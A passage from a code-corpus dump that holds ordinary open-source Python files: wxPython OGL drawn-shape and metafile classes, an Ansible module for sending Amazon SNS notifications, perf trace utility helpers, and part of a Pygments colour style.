def __init__(self, theOp, theX1, theY1, theX2, theY2, theRadius = 0.0, s = ""):
DrawOp.__init__(self, theOp)
self._x1 = theX1
self._y1 = theY1
self._x2 = theX2
self._y2 = theY2
self._x3 = 0.0
self._y3 = 0.0
self._radius = theRadius
self._textString = s
def Do(self, dc, xoffset, yoffset):
if self._op == DRAWOP_DRAW_LINE:
dc.DrawLine(self._x1 + xoffset, self._y1 + yoffset, self._x2 + xoffset, self._y2 + yoffset)
elif self._op == DRAWOP_DRAW_RECT:
dc.DrawRectangle(self._x1 + xoffset, self._y1 + yoffset, self._x2, self._y2)
elif self._op == DRAWOP_DRAW_ROUNDED_RECT:
dc.DrawRoundedRectangle(self._x1 + xoffset, self._y1 + yoffset, self._x2, self._y2, self._radius)
elif self._op == DRAWOP_DRAW_ELLIPSE:
dc.DrawEllipse(self._x1 + xoffset, self._y1 + yoffset, self._x2, self._y2)
elif self._op == DRAWOP_DRAW_ARC:
dc.DrawArc(self._x2 + xoffset, self._y2 + yoffset, self._x3 + xoffset, self._y3 + yoffset, self._x1 + xoffset, self._y1 + yoffset)
elif self._op == DRAWOP_DRAW_ELLIPTIC_ARC:
dc.DrawEllipticArc(self._x1 + xoffset, self._y1 + yoffset, self._x2, self._y2, self._x3 * 360 / (2 * math.pi), self._y3 * 360 / (2 * math.pi))
elif self._op == DRAWOP_DRAW_POINT:
dc.DrawPoint(self._x1 + xoffset, self._y1 + yoffset)
elif self._op == DRAWOP_DRAW_TEXT:
dc.DrawText(self._textString, self._x1 + xoffset, self._y1 + yoffset)
def Scale(self, scaleX, scaleY):
self._x1 *= scaleX
self._y1 *= scaleY
self._x2 *= scaleX
self._y2 *= scaleY
if self._op != DRAWOP_DRAW_ELLIPTIC_ARC:
self._x3 *= scaleX
self._y3 *= scaleY
self._radius *= scaleX
def Translate(self, x, y):
self._x1 += x
self._y1 += y
if self._op == DRAWOP_DRAW_LINE:
self._x2 += x
self._y2 += y
elif self._op == DRAWOP_DRAW_ARC:
self._x2 += x
self._y2 += y
self._x3 += x
self._y3 += y
def Rotate(self, x, y, theta, sinTheta, cosTheta):
newX1 = self._x1 * cosTheta + self._y1 * sinTheta + x * (1 - cosTheta) + y * sinTheta
newY1 = self._x1 * sinTheta + self._y1 * cosTheta + y * (1 - cosTheta) + x * sinTheta
if self._op == DRAWOP_DRAW_LINE:
newX2 = self._x2 * cosTheta - self._y2 * sinTheta + x * (1 - cosTheta) + y * sinTheta
newY2 = self._x2 * sinTheta + self._y2 * cosTheta + y * (1 - cosTheta) + x * sinTheta;
self._x1 = newX1
self._y1 = newY1
self._x2 = newX2
self._y2 = newY2
elif self._op in [DRAWOP_DRAW_RECT, DRAWOP_DRAW_ROUNDED_RECT, DRAWOP_DRAW_ELLIPTIC_ARC]:
# Assume only 0, 90, 180, 270 degree rotations.
# oldX1, oldY1 represents the top left corner. Find the
# bottom right, and rotate that. Then the width/height is
# the difference between x/y values.
oldBottomRightX = self._x1 + self._x2
oldBottomRightY = self._y1 + self._y2
newBottomRightX = oldBottomRightX * cosTheta - oldBottomRightY * sinTheta + x * (1 - cosTheta) + y * sinTheta
newBottomRightY = oldBottomRightX * sinTheta + oldBottomRightY * cosTheta + y * (1 - cosTheta) + x * sinTheta
# Now find the new top-left, bottom-right coordinates.
minX = min(newX1, newBottomRightX)
minY = min(newY1, newBottomRightY)
maxX = max(newX1, newBottomRightX)
maxY = max(newY1, newBottomRightY)
self._x1 = minX
self._y1 = minY
self._x2 = maxX - minX # width
self._y2 = maxY - minY # height
if self._op == DRAWOP_DRAW_ELLIPTIC_ARC:
# Add rotation to angles
self._x3 += theta
self._y3 += theta
elif self._op == DRAWOP_DRAW_ARC:
newX2 = self._x2 * cosTheta - self._y2 * sinTheta + x * (1 - cosTheta) + y * sinTheta
newY2 = self._x2 * sinTheta + self._y2 * cosTheta + y * (1 - cosTheta) + x * sinTheta
newX3 = self._x3 * cosTheta - self._y3 * sinTheta + x * (1 - cosTheta) + y * sinTheta
newY3 = self._x3 * sinTheta + self._y3 * cosTheta + y * (1 - cosTheta) + x * sinTheta
self._x1 = newX1
self._y1 = newY1
self._x2 = newX2
self._y2 = newY2
self._x3 = newX3
self._y3 = newY3
class OpPolyDraw(DrawOp):
"""Draw polygon, polyline, spline."""
def __init__(self, theOp, thePoints):
DrawOp.__init__(self, theOp)
self._noPoints = len(thePoints)
self._points = thePoints
def Do(self, dc, xoffset, yoffset):
if self._op == DRAWOP_DRAW_POLYLINE:
dc.DrawLines(self._points, xoffset, yoffset)
elif self._op == DRAWOP_DRAW_POLYGON:
dc.DrawPolygon(self._points, xoffset, yoffset)
elif self._op == DRAWOP_DRAW_SPLINE:
dc.DrawSpline(self._points) # no offsets in DrawSpline
def Scale(self, scaleX, scaleY):
for i in range(self._noPoints):
self._points[i] = wx.Point(self._points[i][0] * scaleX, self._points[i][1] * scaleY)
def Translate(self, x, y):
for i in range(self._noPoints):
self._points[i][0] += x
self._points[i][1] += y
def Rotate(self, x, y, theta, sinTheta, cosTheta):
for i in range(self._noPoints):
x1 = self._points[i][0]
y1 = self._points[i][1]
self._points[i] = x1 * cosTheta - y1 * sinTheta + x * (1 - cosTheta) + y * sinTheta, x1 * sinTheta + y1 * cosTheta + y * (1 - cosTheta) + x * sinTheta
def OnDrawOutline(self, dc, x, y, w, h, oldW, oldH):
dc.SetBrush(wx.TRANSPARENT_BRUSH)
# Multiply all points by proportion of new size to old size
x_proportion = abs(w / oldW)
y_proportion = abs(h / oldH)
dc.DrawPolygon([(x_proportion * x, y_proportion * y) for x, y in self._points], x, y)
def GetPerimeterPoint(self, x1, y1, x2, y2, xOffset, yOffset, attachmentMode):
# First check for situation where the line is vertical,
# and we would want to connect to a point on that vertical --
# oglFindEndForPolyline can't cope with this (the arrow
# gets drawn to the wrong place).
if attachmentMode == ATTACHMENT_MODE_NONE and x1 == x2:
# Look for the point we'd be connecting to. This is
# a heuristic...
for point in self._points:
if point[0] == 0:
if y2 > y1 and point[1] > 0:
return point[0]+xOffset, point[1]+yOffset
elif y2 < y1 and point[1] < 0:
return point[0]+xOffset, point[1]+yOffset
return FindEndForPolyline([ p[0] + xOffset for p in self._points ],
[ p[1] + yOffset for p in self._points ],
x1, y1, x2, y2)
class PseudoMetaFile(object):
"""
A simple metafile-like class which can load data from a Windows
metafile on all platforms.
"""
def __init__(self):
self._currentRotation = 0
self._rotateable = True
self._width = 0.0
self._height = 0.0
self._outlinePen = None
self._fillBrush = None
self._outlineOp = -1
self._ops = []
self._gdiObjects = []
self._outlineColours = []
self._fillColours = []
def Clear(self):
self._ops = []
self._gdiObjects = []
self._outlineColours = []
self._fillColours = []
self._outlineColours = -1
def IsValid(self):
return self._ops != []
def GetOps(self):
return self._ops
def SetOutlineOp(self, op):
self._outlineOp = op
def GetOutlineOp(self):
return self._outlineOp
def SetOutlinePen(self, pen):
self._outlinePen = pen
def GetOutlinePen(self, pen):
return self._outlinePen
def SetFillBrush(self, brush):
self._fillBrush = brush
def GetFillBrush(self):
return self._fillBrush
def SetSize(self, w, h):
self._width = w
self._height = h
def SetRotateable(self, rot):
self._rotateable = rot
def GetRotateable(self):
return self._rotateable
def GetFillColours(self):
return self._fillColours
def GetOutlineColours(self):
return self._outlineColours
def Draw(self, dc, xoffset, yoffset):
for op in self._ops:
op.Do(dc, xoffset, yoffset)
def Scale(self, sx, sy):
for op in self._ops:
op.Scale(sx, sy)
self._width *= sx
self._height *= sy
def Translate(self, x, y):
for op in self._ops:
op.Translate(x, y)
def Rotate(self, x, y, theta):
theta1 = theta - self._currentRotation
if theta1 == 0:
return
cosTheta = math.cos(theta1)
sinTheta = math.sin(theta1)
for op in self._ops:
op.Rotate(x, y, theta, sinTheta, cosTheta)
self._currentRotation = theta
def LoadFromMetaFile(self, filename, rwidth, rheight):
if not os.path.exist(filename):
return False
print "LoadFromMetaFile not implemented yet."
return False # TODO
# Scale to fit size
def ScaleTo(self, w, h):
scaleX = w / self._width
scaleY = h / self._height
self.Scale(scaleX, scaleY)
def GetBounds(self):
maxX, maxY, minX, minY = -99999.9, -99999.9, 99999.9, 99999.9
for op in self._ops:
if op.GetOp() in [DRAWOP_DRAW_LINE, DRAWOP_DRAW_RECT, DRAWOP_DRAW_ROUNDED_RECT, DRAWOP_DRAW_ELLIPSE, DRAWOP_DRAW_POINT, DRAWOP_DRAW_TEXT]:
if op._x1 < minX:
minX = op._x1
if op._x1 > maxX:
maxX = op._x1
if op._y1 < minY:
minY = op._y1
if op._y1 > maxY:
maxY = op._y1
if op.GetOp() == DRAWOP_DRAW_LINE:
if op._x2 < minX:
minX = op._x2
if op._x2 > maxX:
maxX = op._x2
if op._y2 < minY:
minY = op._y2
if op._y2 > maxY:
maxY = op._y2
elif op.GetOp() in [ DRAWOP_DRAW_RECT, DRAWOP_DRAW_ROUNDED_RECT, DRAWOP_DRAW_ELLIPSE]:
if op._x1 + op._x2 < minX:
minX = op._x1 + op._x2
if op._x1 + op._x2 > maxX:
maxX = op._x1 + op._x2
if op._y1 + op._y2 < minY:
minY = op._y1 + op._y2
if op._y1 + op._y2 > maxX:
maxY = op._y1 + op._y2
elif op.GetOp() == DRAWOP_DRAW_ARC:
# TODO: don't yet know how to calculate the bounding box
# for an arc. So pretend it's a line; to get a correct
# bounding box, draw a blank rectangle first, of the
# correct size.
if op._x1 < minX:
minX = op._x1
if op._x1 > maxX:
maxX = op._x1
if op._y1 < minY:
minY = op._y1
if op._y1 > maxY:
maxY = op._y1
if op._x2 < minX:
minX = op._x2
if op._x2 > maxX:
maxX = op._x2
if op._y2 < minY:
minY = op._y2
if op._y2 > maxY:
maxY = op._y2
elif op.GetOp() in [DRAWOP_DRAW_POLYLINE, DRAWOP_DRAW_POLYGON, DRAWOP_DRAW_SPLINE]:
for point in op._points:
if point[0] < minX:
minX = point[0]
if point[0] > maxX:
maxX = point[0]
if point[1] < minY:
minY = point[1]
if point[1] > maxY:
maxY = point[1]
return [minX, minY, maxX, maxY]
# Calculate size from current operations
def CalculateSize(self, shape):
boundMinX, boundMinY, boundMaxX, boundMaxY = self.GetBounds()
# By Pierre Hjälm: This is NOT in the old version, which
# gets this totally wrong. Since the drawing is centered, we
# cannot get the width by measuring from left to right, we
# must instead make enough room to handle the largest
# coordinates
#self.SetSize(boundMaxX - boundMinX, boundMaxY - boundMinY)
w = max(abs(boundMinX), abs(boundMaxX)) * 2
h = max(abs(boundMinY), abs(boundMaxY)) * 2
self.SetSize(w, h)
if shape:
shape.SetWidth(self._width)
shape.SetHeight(self._height)
# Set of functions for drawing into a pseudo metafile
def DrawLine(self, pt1, pt2):
op = OpDraw(DRAWOP_DRAW_LINE, pt1[0], pt1[1], pt2[0], pt2[1])
self._ops.append(op)
def DrawRectangle(self, rect):
op = OpDraw(DRAWOP_DRAW_RECT, rect[0], rect[1], rect[2], rect[3])
self._ops.append(op)
def DrawRoundedRectangle(self, rect, radius):
op = OpDraw(DRAWOP_DRAW_ROUNDED_RECT, rect[0], rect[1], rect[2], rect[3])
op._radius = radius
self._ops.append(op)
def DrawEllipse(self, rect):
op = OpDraw(DRAWOP_DRAW_ELLIPSE, rect[0], rect[1], rect[2], rect[3])
self._ops.append(op)
def DrawArc(self, centrePt, startPt, endPt):
op = OpDraw(DRAWOP_DRAW_ARC, centrePt[0], centrePt[1], startPt[0], startPt[1])
op._x3, op._y3 = endPt
self._ops.append(op)
def DrawEllipticArc(self, rect, startAngle, endAngle):
startAngleRadians = startAngle * math.pi * 2 / 360
endAngleRadians = endAngle * math.pi * 2 / 360
op = OpDraw(DRAWOP_DRAW_ELLIPTIC_ARC, rect[0], rect[1], rect[2], rect[3])
op._x3 = startAngleRadians
op._y3 = endAngleRadians
self._ops.append(op)
def DrawPoint(self, pt):
op = OpDraw(DRAWOP_DRAW_POINT, pt[0], pt[1], 0, 0)
self._ops.append(op)
def DrawText(self, text, pt):
op = OpDraw(DRAWOP_DRAW_TEXT, pt[0], pt[1], 0, 0)
op._textString = text
self._ops.append(op)
def DrawLines(self, pts):
op = OpPolyDraw(DRAWOP_DRAW_POLYLINE, pts)
self._ops.append(op)
# flags:
# oglMETAFLAGS_OUTLINE: will be used for drawing the outline and
# also drawing lines/arrows at the circumference.
# oglMETAFLAGS_ATTACHMENTS: will be used for initialising attachment
# points at the vertices (perhaps a rare case...)
def DrawPolygon(self, pts, flags = 0):
op = OpPolyDraw(DRAWOP_DRAW_POLYGON, pts)
self._ops.append(op)
if flags & METAFLAGS_OUTLINE:
self._outlineOp = len(self._ops) - 1
def DrawSpline(self, pts):
op = OpPolyDraw(DRAWOP_DRAW_SPLINE, pts)
self._ops.append(op)
def SetClippingRect(self, rect):
OpSetClipping(DRAWOP_SET_CLIPPING_RECT, rect[0], rect[1], rect[2], rect[3])
def DestroyClippingRect(self):
op = OpSetClipping(DRAWOP_DESTROY_CLIPPING_RECT, 0, 0, 0, 0)
self._ops.append(op)
def SetPen(self, pen, isOutline = False):
self._gdiObjects.append(pen)
op = OpSetGDI(DRAWOP_SET_PEN, self, len(self._gdiObjects) - 1)
self._ops.append(op)
if isOutline:
self._outlineColours.append(len(self._gdiObjects) - 1)
def SetBrush(self, brush, isFill = False):
self._gdiObjects.append(brush)
op = OpSetGDI(DRAWOP_SET_BRUSH, self, len(self._gdiObjects) - 1)
self._ops.append(op)
if isFill:
self._fillColours.append(len(self._gdiObjects) - 1)
def SetFont(self, font):
self._gdiObjects.append(font)
op = OpSetGDI(DRAWOP_SET_FONT, self, len(self._gdiObjects) - 1)
self._ops.append(op)
def SetTextColour(self, colour):
op = OpSetGDI(DRAWOP_SET_TEXT_COLOUR, self, 0)
op._r, op._g, op._b = colour.Red(), colour.Green(), colour.Blue()
self._ops.append(op)
def SetBackgroundColour(self, colour):
op = OpSetGDI(DRAWOP_SET_BK_COLOUR, self, 0)
op._r, op._g, op._b = colour.Red(), colour.Green(), colour.Blue()
self._ops.append(op)
def SetBackgroundMode(self, mode):
op = OpSetGDI(DRAWOP_SET_BK_MODE, self, 0)
self._ops.append(op)
class DrawnShape(RectangleShape):
"""
Draws a pseudo-metafile shape, which can be loaded from a simple
Windows metafile.
wxDrawnShape allows you to specify a different shape for each of four
orientations (North, West, South and East). It also provides a set of
drawing functions for programmatic drawing of a shape, so that during
construction of the shape you can draw into it as if it were a device
context.
Derived from:
RectangleShape
"""
def __init__(self):
RectangleShape.__init__(self, 100, 50)
self._saveToFile = True
self._currentAngle = DRAWN_ANGLE_0
self._metafiles=PseudoMetaFile(), PseudoMetaFile(), PseudoMetaFile(), PseudoMetaFile()
def OnDraw(self, dc):
# Pass pen and brush in case we have force outline
# and fill colours
if self._shadowMode != SHADOW_NONE:
if self._shadowBrush:
self._metafiles[self._currentAngle]._fillBrush = self._shadowBrush
self._metafiles[self._currentAngle]._outlinePen = wx.Pen(wx.WHITE, 1, wx.TRANSPARENT)
self._metafiles[self._currentAngle].Draw(dc, self._xpos + self._shadowOffsetX, self._ypos + self._shadowOffsetY)
self._metafiles[self._currentAngle]._outlinePen = self._pen
self._metafiles[self._currentAngle]._fillBrush = self._brush
self._metafiles[self._currentAngle].Draw(dc, self._xpos, self._ypos)
def SetSize(self, w, h, recursive = True):
self.SetAttachmentSize(w, h)
if self.GetWidth() == 0.0:
scaleX = 1
else:
scaleX = w / self.GetWidth()
if self.GetHeight() == 0.0:
scaleY = 1
else:
scaleY = h / self.GetHeight()
for i in range(4):
if self._metafiles[i].IsValid():
self._metafiles[i].Scale(scaleX, scaleY)
self._width = w
self._height = h
self.SetDefaultRegionSize()
def Scale(self, sx, sy):
"""Scale the shape by the given amount."""
for i in range(4):
if self._metafiles[i].IsValid():
self._metafiles[i].Scale(sx, sy)
self._metafiles[i].CalculateSize(self)
def Translate(self, x, y):
"""Translate the shape by the given amount."""
for i in range(4):
if self._metafiles[i].IsValid():
self._metafiles[i].Translate(x, y)
self._metafiles[i].CalculateSize(self)
# theta is absolute rotation from the zero position
def Rotate(self, x, y, theta):
"""Rotate about the given axis by the given amount in radians."""
self._currentAngle = self.DetermineMetaFile(theta)
if self._currentAngle == 0:
# Rotate metafile
if not self._metafiles[0].GetRotateable():
return
self._metafiles[0].Rotate(x, y, theta)
actualTheta = theta - self._rotation
# Rotate attachment points
sinTheta = math.sin(actualTheta)
cosTheta = math.cos(actualTheta)
for point in self._attachmentPoints:
x1 = point._x
y1 = point._y
point._x = x1 * cosTheta - y1 * sinTheta + x * (1.0 - cosTheta) + y * sinTheta
point._y = x1 * sinTheta + y1 * cosTheta + y * (1.0 - cosTheta) + x * sinTheta
self._rotation = theta
self._metafiles[self._currentAngle].CalculateSize(self)
# Which metafile do we use now? Based on current rotation and validity
# of metafiles.
def DetermineMetaFile(self, rotation):
tolerance = 0.0001
angles = [0.0, math.pi / 2, math.pi, 3 * math.pi / 2]
whichMetaFile = 0
for i in range(4):
if RoughlyEqual(rotation, angles[i], tolerance):
whichMetaFile = i
break
if whichMetaFile > 0 and not self._metafiles[whichMetaFile].IsValid():
whichMetaFile = 0
return whichMetaFile
def OnDrawOutline(self, dc, x, y, w, h):
if self._metafiles[self._currentAngle].GetOutlineOp() != -1:
op = self._metafiles[self._currentAngle].GetOps()[self._metafiles[self._currentAngle].GetOutlineOp()]
if op.OnDrawOutline(dc, x, y, w, h, self._width, self._height):
return
# Default... just use a rectangle
RectangleShape.OnDrawOutline(self, dc, x, y, w, h)
# Get the perimeter point using the special outline op, if there is one,
# otherwise use default wxRectangleShape scheme
def GetPerimeterPoint(self, x1, y1, x2, y2):
if self._metafiles[self._currentAngle].GetOutlineOp() != -1:
op = self._metafiles[self._currentAngle].GetOps()[self._metafiles[self._currentAngle].GetOutlineOp()]
p = op.GetPerimeterPoint(x1, y1, x2, y2, self.GetX(), self.GetY(), self.GetAttachmentMode())
if p:
return p
return RectangleShape.GetPerimeterPoint(self, x1, y1, x2, y2)
def LoadFromMetaFile(self, filename):
"""Load a (very simple) Windows metafile, created for example by
Top Draw, the Windows shareware graphics package."""
return self._metafiles[0].LoadFromMetaFile(filename)
# Set of functions for drawing into a pseudo metafile.
# They use integers, but doubles are used internally for accuracy
# when scaling.
def DrawLine(self, pt1, pt2):
self._metafiles[self._currentAngle].DrawLine(pt1, pt2)
def DrawRectangle(self, rect):
self._metafiles[self._currentAngle].DrawRectangle(rect)
def DrawRoundedRectangle(self, rect, radius):
"""Draw a rounded rectangle.
radius is the corner radius. If radius is negative, it expresses
the radius as a proportion of the smallest dimension of the rectangle.
"""
self._metafiles[self._currentAngle].DrawRoundedRectangle(rect, radius)
def DrawEllipse(self, rect):
self._metafiles[self._currentAngle].DrawEllipse(rect)
def DrawArc(self, centrePt, startPt, endPt):
"""Draw an arc."""
self._metafiles[self._currentAngle].DrawArc(centrePt, startPt, endPt)
def DrawEllipticArc(self, rect, startAngle, endAngle):
"""Draw an elliptic arc."""
self._metafiles[self._currentAngle].DrawEllipticArc(rect, startAngle, endAngle)
def DrawPoint(self, pt):
self._metafiles[self._currentAngle].DrawPoint(pt)
def DrawText(self, text, pt):
self._metafiles[self._currentAngle].DrawText(text, pt)
def DrawLines(self, pts):
self._metafiles[self._currentAngle].DrawLines(pts)
def DrawPolygon(self, pts, flags = 0):
"""Draw a polygon.
flags can be one or more of:
METAFLAGS_OUTLINE (use this polygon for the drag outline) and
METAFLAGS_ATTACHMENTS (use the vertices of this polygon for attachments).
"""
if flags and METAFLAGS_ATTACHMENTS:
self.ClearAttachments()
for i in range(len(pts)):
self._attachmentPoints.append(AttachmentPoint(i,pts[i][0],pts[i][1]))
self._metafiles[self._currentAngle].DrawPolygon(pts, flags)
def DrawSpline(self, pts):
self._metafiles[self._currentAngle].DrawSpline(pts)
def SetClippingRect(self, rect):
"""Set the clipping rectangle."""
self._metafiles[self._currentAngle].SetClippingRect(rect)
def DestroyClippingRect(self):
"""Destroy the clipping rectangle."""
self._metafiles[self._currentAngle].DestroyClippingRect()
def SetDrawnPen(self, pen, isOutline = False):
"""Set the pen for this metafile.
If isOutline is True, this pen is taken to indicate the outline
(and if the outline pen is changed for the whole shape, the pen
will be replaced with the outline pen).
"""
self._metafiles[self._currentAngle].SetPen(pen, isOutline)
def SetDrawnBrush(self, brush, isFill = False):
"""Set the brush for this metafile.
If isFill is True, the brush is used as the fill brush.
"""
self._metafiles[self._currentAngle].SetBrush(brush, isFill)
def SetDrawnFont(self, font):
self._metafiles[self._currentAngle].SetFont(font)
def SetDrawnTextColour(self, colour):
"""Set the current text colour for the current metafile."""
self._metafiles[self._currentAngle].SetTextColour(colour)
def SetDrawnBackgroundColour(self, colour):
"""Set the current background colour for the current metafile."""
self._metafiles[self._currentAngle].SetBackgroundColour(colour)
def SetDrawnBackgroundMode(self, mode):
"""Set the current background mode for the current metafile."""
self._metafiles[self._currentAngle].SetBackgroundMode(mode)
def CalculateSize(self):
"""Calculate the wxDrawnShape size from the current metafile.
Call this after you have drawn into the shape.
"""
self._metafiles[self._currentAngle].CalculateSize(self)
def DrawAtAngle(self, angle):
"""Set the metafile for the given orientation, which can be one of:
* DRAWN_ANGLE_0
* DRAWN_ANGLE_90
* DRAWN_ANGLE_180
* DRAWN_ANGLE_270
"""
self._currentAngle = angle
def GetAngle(self):
"""Return the current orientation, which can be one of:
* DRAWN_ANGLE_0
* DRAWN_ANGLE_90
* DRAWN_ANGLE_180
* DRAWN_ANGLE_270
"""
return self._currentAngle
def GetRotation(self):
"""Return the current rotation of the shape in radians."""
return self._rotation
def SetSaveToFile(self, save):
"""If save is True, the image will be saved along with the shape's
other attributes. The reason why this might not be desirable is that
if there are many shapes with the same image, it would be more
efficient for the application to save one copy, and not duplicate
the information for every shape. The default is True.
"""
self._saveToFile = save
def GetMetaFile(self, which = 0):
"""Return a reference to the internal 'pseudo-metafile'."""
return self._metafiles[which]
| agpl-3.0 |
stefanweller/ansible-modules-extras | notification/sns.py | 44 | 5736 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Michael J. Schultz <mjschultz@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
module: sns
short_description: Send Amazon Simple Notification Service (SNS) messages
description:
- The M(sns) module sends notifications to a topic on your Amazon SNS account
version_added: 1.6
author: "Michael J. Schultz (@mjschultz)"
options:
msg:
description:
- Default message to send.
required: true
aliases: [ "default" ]
subject:
description:
- Subject line for email delivery.
required: false
topic:
description:
- The topic you want to publish to.
required: true
email:
description:
- Message to send to email-only subscription
required: false
sqs:
description:
- Message to send to SQS-only subscription
required: false
sms:
description:
- Message to send to SMS-only subscription
required: false
http:
description:
- Message to send to HTTP-only subscription
required: false
https:
description:
- Message to send to HTTPS-only subscription
required: false
aws_secret_key:
description:
- AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used.
required: false
default: None
aliases: ['ec2_secret_key', 'secret_key']
aws_access_key:
description:
- AWS access key. If not set then the value of the AWS_ACCESS_KEY environment variable is used.
required: false
default: None
aliases: ['ec2_access_key', 'access_key']
region:
description:
- The AWS region to use. If not specified then the value of the EC2_REGION environment variable, if any, is used.
required: false
aliases: ['aws_region', 'ec2_region']
requirements: [ "boto" ]
"""
EXAMPLES = """
- name: Send default notification message via SNS
local_action:
module: sns
msg: "{{ inventory_hostname }} has completed the play."
subject: "Deploy complete!"
topic: "deploy"
- name: Send notification messages via SNS with short message for SMS
local_action:
module: sns
msg: "{{ inventory_hostname }} has completed the play."
sms: "deployed!"
subject: "Deploy complete!"
topic: "deploy"
"""
import sys
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
try:
import boto
import boto.ec2
import boto.sns
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def arn_topic_lookup(connection, short_topic):
response = connection.get_all_topics()
result = response[u'ListTopicsResponse'][u'ListTopicsResult']
# topic names cannot have colons, so this captures the full topic name
lookup_topic = ':{}'.format(short_topic)
for topic in result[u'Topics']:
if topic[u'TopicArn'].endswith(lookup_topic):
return topic[u'TopicArn']
return None
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
msg=dict(type='str', required=True, aliases=['default']),
subject=dict(type='str', default=None),
topic=dict(type='str', required=True),
email=dict(type='str', default=None),
sqs=dict(type='str', default=None),
sms=dict(type='str', default=None),
http=dict(type='str', default=None),
https=dict(type='str', default=None),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
msg = module.params['msg']
subject = module.params['subject']
topic = module.params['topic']
email = module.params['email']
sqs = module.params['sqs']
sms = module.params['sms']
http = module.params['http']
https = module.params['https']
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg="region must be specified")
try:
connection = connect_to_aws(boto.sns, region, **aws_connect_params)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=str(e))
# .publish() takes full ARN topic id, but I'm lazy and type shortnames
# so do a lookup (topics cannot contain ':', so thats the decider)
if ':' in topic:
arn_topic = topic
else:
arn_topic = arn_topic_lookup(connection, topic)
if not arn_topic:
module.fail_json(msg='Could not find topic: {}'.format(topic))
dict_msg = {'default': msg}
if email:
dict_msg.update(email=email)
if sqs:
dict_msg.update(sqs=sqs)
if sms:
dict_msg.update(sms=sms)
if http:
dict_msg.update(http=http)
if https:
dict_msg.update(https=https)
json_msg = json.dumps(dict_msg)
try:
connection.publish(topic=arn_topic, subject=subject,
message_structure='json', message=json_msg)
except boto.exception.BotoServerError, e:
module.fail_json(msg=str(e))
module.exit_json(msg="OK")
main()
| gpl-3.0 |
fell978/kernel_huawei | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py | 12527 | 1935 | # Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
| gpl-2.0 |
hortinstein/ghost_hortinstein.github.io | node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/styles/friendly.py | 364 | 2515 | # -*- coding: utf-8 -*-
"""
pygments.styles.friendly
~~~~~~~~~~~~~~~~~~~~~~~~
A modern style based on the VIM pyte theme.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class FriendlyStyle(Style):
"""
A modern style based on the VIM pyte theme.
"""
background_color = "#f0f0f0"
default_style = ""
styles = {
Whitespace: "#bbbbbb",
Comment: "italic #60a0b0",
Comment.Preproc: "noitalic #007020",
Comment.Special: "noitalic bg:#fff0f0",
Keyword: "bold #007020",
Keyword.Pseudo: "nobold",
Keyword.Type: "nobold #902000",
Operator: "#666666",
Operator.Word: "bold #007020",
Name.Builtin: "#007020",
Name.Function: "#06287e",
Name.Class: "bold #0e84b5",
Name.Namespace: "bold #0e84b5",
Name.Exception: "#007020",
Name.Variable: "#bb60d5",
Name.Constant: "#60add5",
Name.Label: "bold #002070",
Name.Entity: "bold #d55537",
Name.Attribute: "#4070a0",
Name.Tag: "bold #062873",
Name.Decorator: "bold #555555",
String: "#4070a0",
String.Doc: "italic",
String.Interpol: "italic #70a0d0",
String.Escape: "bold #4070a0",
String.Regex: "#235388",
String.Symbol: "#517918",
String.Other: "#c65d09",
Number: "#40a070",
Generic.Heading: "bold #000080",
Generic.Subheading: "bold #800080",
Generic.Deleted: "#A00000",
Generic.Inserted: "#00A000",
Generic.Error: "#FF0000",
Generic.Emph: "italic",
Generic.Strong: "bold",
